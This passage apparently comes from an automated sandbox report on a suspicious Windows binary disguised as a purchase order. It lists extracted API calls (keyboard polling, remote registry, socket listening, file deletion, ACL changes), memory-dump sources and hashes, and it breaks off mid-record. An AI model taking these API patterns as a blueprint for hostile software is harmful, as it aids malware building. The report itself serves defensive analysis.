                                                                                                                                                                                                        • Part of subcall function 0043ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0043ABD7
                                                                                                                                                                                                        • Part of subcall function 0043ABBB: GetLastError.KERNEL32(?,0043A69F,?,?,?), ref: 0043ABE1
                                                                                                                                                                                                        • Part of subcall function 0043ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0043A69F,?,?,?), ref: 0043ABF0
                                                                                                                                                                                                        • Part of subcall function 0043ABBB: HeapAlloc.KERNEL32(00000000,?,0043A69F,?,?,?), ref: 0043ABF7
                                                                                                                                                                                                        • Part of subcall function 0043ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0043AC0E
                                                                                                                                                                                                        • Part of subcall function 0043AC56: GetProcessHeap.KERNEL32(00000008,0043A6B5,00000000,00000000,?,0043A6B5,?), ref: 0043AC62
                                                                                                                                                                                                        • Part of subcall function 0043AC56: HeapAlloc.KERNEL32(00000000,?,0043A6B5,?), ref: 0043AC69
                                                                                                                                                                                                        • Part of subcall function 0043AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0043A6B5,?), ref: 0043AC7A
                                                                                                                                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0043A6D0
                                                                                                                                                                                                      • _memset.LIBCMT ref: 0043A6E5
                                                                                                                                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0043A704
                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 0043A715
                                                                                                                                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 0043A752
                                                                                                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0043A76E
                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 0043A78B
                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0043A79A
                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0043A7A1
                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0043A7C2
                                                                                                                                                                                                      • CopySid.ADVAPI32(00000000), ref: 0043A7C9
                                                                                                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0043A7FA
                                                                                                                                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0043A820
                                                                                                                                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0043A834
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3996160137-0
                                                                                                                                                                                                      • Opcode ID: 19c88d49b77f25d1d4edcb9946f7d701142184e577521806ced28fc7d34eebce
                                                                                                                                                                                                      • Instruction ID: 144342650f90ac67701e10cbe64f2ac991e70e4539ce56d8947383b5d4265896
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 19c88d49b77f25d1d4edcb9946f7d701142184e577521806ced28fc7d34eebce
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2B516C71900209ABDF049F91DC84EEFBBB9FF09304F14812AE951AA290D739DA15CB69
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: J$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$JJJ J
                                                                                                                                                                                                      • API String ID: 0-2551290072
                                                                                                                                                                                                      • Opcode ID: 7396a4921f9da90dd1aae6694be548c28df0cce0295820056248e47a2d119cc0
                                                                                                                                                                                                      • Instruction ID: 487dcb99b698c5f55c49da48b78915288c7c7a08838464614983928d51956754
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7396a4921f9da90dd1aae6694be548c28df0cce0295820056248e47a2d119cc0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED72AF71E042198BDB24DF59C8807AEB7B5FF48710F10856BE805EB381DB789E81DB99
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00446EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00445FA6,?), ref: 00446ED8
                                                                                                                                                                                                        • Part of subcall function 004472CB: GetFileAttributesW.KERNEL32(?,00446019), ref: 004472CC
                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00446441
                                                                                                                                                                                                      • __wsplitpath.LIBCMT ref: 0044645F
                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00446474
                                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 004464A3
                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 004464B8
                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 004464CA
                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 004464DA
                                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 004464EB
                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00446506
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                                                                                                                                      • String ID: \*.*
                                                                                                                                                                                                      • API String ID: 2643075503-1173974218
                                                                                                                                                                                                      • Opcode ID: 207bf40969deb6b3d3afc2ff0a38490a33ffcbdb27faad35d926c948b6f8fdd0
                                                                                                                                                                                                      • Instruction ID: 73c7c28cc2d4d292303f02bb6a0fa5fbbca2d385feff7c8596e80d02910825b5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 207bf40969deb6b3d3afc2ff0a38490a33ffcbdb27faad35d926c948b6f8fdd0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2231A2B2408384AAD721EFA498899DFB7DCAF56314F40092FF5D9C3142EA39D509876B
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00463C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00462BB5,?,?), ref: 00463C1D
                                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046328E
                                                                                                                                                                                                        • Part of subcall function 0040936C: __swprintf.LIBCMT ref: 004093AB
                                                                                                                                                                                                        • Part of subcall function 0040936C: __itow.LIBCMT ref: 004093DF
                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0046332D
                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004633C5
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00463604
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00463611
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1240663315-0
                                                                                                                                                                                                      • Opcode ID: 019a2f30d2ecd651abe24be71f7fb71fec72c31742c80a83df0f528f2ea748fd
                                                                                                                                                                                                      • Instruction ID: dd98911054ea73e03f9d7df8a9ed958b0bc855eff2a36a34133799616501a85a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 019a2f30d2ecd651abe24be71f7fb71fec72c31742c80a83df0f528f2ea748fd
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29E15D71604200AFCB15DF29C991D2BBBE8EF89714F04896EF84AD72A1DB34ED05CB56
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetKeyboardState.USER32(?), ref: 00442B5F
                                                                                                                                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00442BE0
                                                                                                                                                                                                      • GetKeyState.USER32(000000A0), ref: 00442BFB
                                                                                                                                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00442C15
                                                                                                                                                                                                      • GetKeyState.USER32(000000A1), ref: 00442C2A
                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 00442C42
                                                                                                                                                                                                      • GetKeyState.USER32(00000011), ref: 00442C54
                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 00442C6C
                                                                                                                                                                                                      • GetKeyState.USER32(00000012), ref: 00442C7E
                                                                                                                                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00442C96
                                                                                                                                                                                                      • GetKeyState.USER32(0000005B), ref: 00442CA8
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: State$Async$Keyboard
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 541375521-0
                                                                                                                                                                                                      • Opcode ID: 629986fe9d90edc1b041164729a41c8d55ba068e98bacfd23210ab532d53a138
                                                                                                                                                                                                      • Instruction ID: 98e4a09438c2f24bdc0efa4923423c0104262d1b5743e155bd91d11c533266cc
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 629986fe9d90edc1b041164729a41c8d55ba068e98bacfd23210ab532d53a138
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2141D5309047C96DFF309B608A443ABBFA0AB11354F84445FE9C6563C2DBDC9AC4C7AA
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1737998785-0
                                                                                                                                                                                                      • Opcode ID: f37096166a4371ff03842f42e2ef56189ff75b6b6a6dbb0ea91bd807c9aff62a
                                                                                                                                                                                                      • Instruction ID: 0eb664db9bf6f2b7b87e2a178079bdaabe52376ddd736b46ec2ccd53d521ae62
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f37096166a4371ff03842f42e2ef56189ff75b6b6a6dbb0ea91bd807c9aff62a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4A219C317011149FDB00AF25DC49B6E77A8EF04711F05882EF90ADB2A2EB78EC558B9D
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00439ABF: CLSIDFromProgID.OLE32 ref: 00439ADC
                                                                                                                                                                                                        • Part of subcall function 00439ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00439AF7
                                                                                                                                                                                                        • Part of subcall function 00439ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00439B05
                                                                                                                                                                                                        • Part of subcall function 00439ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00439B15
                                                                                                                                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0045C235
                                                                                                                                                                                                      • _memset.LIBCMT ref: 0045C242
                                                                                                                                                                                                      • _memset.LIBCMT ref: 0045C360
                                                                                                                                                                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0045C38C
                                                                                                                                                                                                      • CoTaskMemFree.OLE32(?), ref: 0045C397
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • NULL Pointer assignment, xrefs: 0045C3E5
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                                                                                                      • String ID: NULL Pointer assignment
                                                                                                                                                                                                      • API String ID: 1300414916-2785691316
                                                                                                                                                                                                      • Opcode ID: ff54f6335ce909c2fa6b6827016a1c9ff4870014f764a5539af47b585deaf951
                                                                                                                                                                                                      • Instruction ID: 3356cdb51167e4131ddd78b1ce382775f49e2990c9d9fa9527947cf0618e9e45
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ff54f6335ce909c2fa6b6827016a1c9ff4870014f764a5539af47b585deaf951
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C912A71D00218AFDB10DF95DC81EDEBBB9AF08714F10816AF915B7282DB74AA45CFA4
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0043B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0043B180
                                                                                                                                                                                                        • Part of subcall function 0043B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0043B1AD
                                                                                                                                                                                                        • Part of subcall function 0043B134: GetLastError.KERNEL32 ref: 0043B1BA
                                                                                                                                                                                                      • ExitWindowsEx.USER32(?,00000000), ref: 00447A0F
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                                                      • String ID: $@$SeShutdownPrivilege
                                                                                                                                                                                                      • API String ID: 2234035333-194228
                                                                                                                                                                                                      • Opcode ID: 150bf5bed513d1e5835323409ad14a908b70762b92def566276f4d62423935ad
                                                                                                                                                                                                      • Instruction ID: b76ccdbae1f18d17e3ead188a27b602ad99dccb6f3d18fa98a9ade3249578edf
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 150bf5bed513d1e5835323409ad14a908b70762b92def566276f4d62423935ad
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3901FC716592116BF7282664DC4BBBF735CD704345F24082BF943B21C2DB6C5E0282BE
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00458CA8
                                                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00458CB7
                                                                                                                                                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00458CD3
                                                                                                                                                                                                      • listen.WSOCK32(00000000,00000005), ref: 00458CE2
                                                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00458CFC
                                                                                                                                                                                                      • closesocket.WSOCK32(00000000,00000000), ref: 00458D10
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1279440585-0
                                                                                                                                                                                                      • Opcode ID: 3aef0437483132550f173dc779258cdeee6d1cdbee113925f016bea3584900cb
                                                                                                                                                                                                      • Instruction ID: 9606cfcbb7039ff7302cbb9cd038319eb674cde66eaf2361e726534cdc00523c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3aef0437483132550f173dc779258cdeee6d1cdbee113925f016bea3584900cb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6921E131A012009FCB10EF64C985A6EB3A9AF48315F10856EED16B73D2CB38AD498B59
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00446554
                                                                                                                                                                                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00446564
                                                                                                                                                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 00446583
                                                                                                                                                                                                      • __wsplitpath.LIBCMT ref: 004465A7
                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 004465BA
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000), ref: 004465F9
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1605983538-0
                                                                                                                                                                                                      • Opcode ID: 2d41c09dd81c2ae839535a0934c8672d61f7edfe20a8949431cfe49a907b3b17
                                                                                                                                                                                                      • Instruction ID: 5a10ba3f14c39411ad8ad50115d45b01add9c21422253e8f096218853a032e33
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d41c09dd81c2ae839535a0934c8672d61f7edfe20a8949431cfe49a907b3b17
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B219571900218BBEB10ABA4DC88FDEB7BCAB05300F5004AAE505D3241DB759F85CB65
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 004413DC
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
